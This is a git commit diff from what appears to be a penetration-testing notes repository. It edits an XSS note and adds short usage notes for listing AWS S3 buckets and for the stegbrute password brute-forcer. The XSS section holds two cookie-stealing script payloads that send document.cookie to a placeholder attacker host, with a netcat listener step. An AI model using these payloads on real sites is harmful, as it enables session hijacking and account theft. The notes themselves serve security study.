whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
Stefan Friese 2021-09-13 01:15:06 +02:00
parent a41a43b6e7
commit 601d2edb2e
3 changed files with 17 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
exploit/web/xss.md
View File

@ -17,7 +17,7 @@ This is where a malicious string originates from the websites database.
``` ```
* Navigte to `/logs` and take sid * Navigte to `/logs` and take sid
* Open nc 4444 and * Open nc port and collect cookies
```sh ```sh
<script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script> <script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script>
<script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script> <script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script>

7
misc/aws/bucket.md Normal file
View File

@ -0,0 +1,7 @@
# AWS Buckets
# Usage
* Enum to s3 bucket
```sh
aws s3 ls s3://bucketname.region-name.amazonaws.com
```

9
stego/docs/stegbrute.md Normal file
View File

@ -0,0 +1,9 @@
# Stegbrute
Bruteforce stego jpegs with a password.
* install via `cargo install stegbrute`
## Usage
```sh
stegbrute -f <filename> -w <wordlist>
```